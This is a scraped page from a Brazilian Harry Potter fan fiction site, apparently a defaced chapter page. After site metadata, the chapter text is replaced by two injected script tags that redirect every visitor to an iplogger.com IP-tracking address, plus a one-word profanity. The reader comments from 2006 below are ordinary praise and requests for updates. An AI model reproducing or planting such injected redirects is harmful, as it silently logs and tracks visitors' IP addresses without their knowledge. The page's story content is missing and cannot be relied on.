","headline":"","url":"https://www.floreioseborroes.net/fics/ver/5005","inLanguage":"pt-BR","genre":"Fan fiction","isAccessibleForFree":true,"description":"Essa fic contém spoilers, dicas, pistas, insinuações, palpites e mais sobre Harry Potter and the Half-Blood Prince. Os personagens e o enred","image":"http://storage.msn.com/x1pFUxp6NG29bW3Uy8xnoGhE3lfnFozsOj27OUjuAgYgzcUOsZ6EQx96JvNJhv6aleexlwABNPPtGP-h9pKtxxztqk09YsUIa25GQDUTXGp657FjIUVEwKu0Xleo521HD0yUElEHid32hDdS-q22xqjPg","datePublished":"2005-08-05","dateModified":"2017-04-25","author":{"@type":"Person","name":"Sônia Sag","url":"https://www.floreioseborroes.net/users/ver/3634"},"publisher":{"@type":"Organization","name":"Floreios e Borroes","url":"https://www.floreioseborroes.net"},"aggregateRating":{"@type":"AggregateRating","ratingValue":4.92,"ratingCount":21437,"bestRating":5,"worstRating":1}}

<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>

<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>

Foda-se


Compartilhe!

anúncio

Comentários (2867)

  • Nossa... vejamos... primeiro, eu nao entendi exatamente o q aconteceu.. claro q com certeza foi por causa do voldemort ter passado suas lembranças para o Harry q o deixou dakele jeito, mas nao entendi pq vc fez isso???? nossa, toda vez q o harry conseguia derrotar de alguma forma o lorde, eu fikava super feliz, mas depois dele conseguir acabar com aquele maldito, ele fica ruim?????? foi bom o cap, mas eu pensei q o harry ficaria bom, pelo menos, se ele morresse eu entenderia.. mas essa, sinceramente eu nao entendi... mas nao vou dizer q odiei, q deixei de gostar da sua fic, pq eh boa... mas esperava soh um final melhor.. hehe tadinho do Harry, tudo culpa daquele maledeto... Arrrrrrr..... Mas... continuo fã de sua fic... se der entra na minha *A marca de uma lagrima* Bjaum mily

    2006-06-06
  • TÁ PERFEEEEEEEEEEEEEEIIITA ! ATUALIZA LOGO ! QUE EU TÔ CURIOSA ! ;]

    2006-06-06
  • Simplimente AMEI esse capitulo!Não só esse mas todos!Mas esse esta muito bom!Muito bom mesmo!! O que aconteceu com o Harry?Ele ficou mau?derepente?!Bom espero que ele volte ao normal!! Fico esperando um proximo capitulo! Vick!

    2006-06-06
  • FALA SÉRIO!!!!! Nunca li uma fic igual a sua. Quem diria melhor???????? Tah muito perfeita!!!! Mas soh naum gostei muito do Harry indo embora do último cap.!!!! Atualiza logo p/ eu ve a continuação, blz? ps.: passa no meu flog: www.flogao.com.br/hpandthemarauders Espalha p/ galera!!! rs Bjao. Último aviso : A T U A L I Z A !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Xau xau!!!!

    2006-06-06
  • Ei Sonia.. o Capitulo foi mas do que eu esperava... MUIIIIITTTTOOOOO BOM***** Por favor não demore para posta o Ultimo ... PELO AMOR DE MERLIM.. a e uma duvida?? o Harry Aparatou dentro de Hog::?? como?? me explica isso... beijos e não demore em....

    2006-06-05
  • nossaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa que foda fico esse capitulo hein sonia ... parabens msm! poe logo o 35 hein ... hehhe =P bjos

    2006-06-05
  • **Bety respira fundo, duas, três vezes** SONIA, o que foi isso???? Que capítulo foi esse mulher??? Eu tô abismada mor and mór! Quero dizer esse cap. foi tudo de bom e muito mais... caramba eu, eu, eu nem sei o que escrever aqui... tipo, o Cara de cobra teve o que mereceu... se teve!! Adorei o jeito que cada um deles ajudou a matá-lo!! Foi demais!! Mulher, eu tô sem fôlego aki!! Completamente passada... e o que é que aconteceu com o Potter??? Francamente!! Aquele lá não é o Harry! Não mesmo!!! Pow Soninha, já tô doida pelo próximo cap. tomara que seja tão muito doido quanto esse!!! Esperando na janela!! Ah sim!!! Cobra estúpida... morreu bem morrida... adorei o Ron!! Aliás eu adoro ele!!! E só pra terminar... mulher, vc ARRASOU demais nesse capítulo... vc tem noção do que vc fez?? Espero que sim... eu tô breathless até agora e vou ficar até não sei quando, mas espero estar melhor daqui a pouco!!! Aff... chega de coisa... Parabéns e pow... vc escreve bem demais!!! I love you e a sua fic tb!!! Vou sentir saudade (Sofrendo por antecipação!!!!) bjs!!!

    2006-06-05
  • ATUALIZA POR FAVOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOR

    2006-06-05
  • ñ curti muito o cap.

    2006-06-05
  • mt booooooooooooaaaaaaa!!! bjsssssssss

    2006-06-05
Você precisa estar logado para comentar. Faça Login.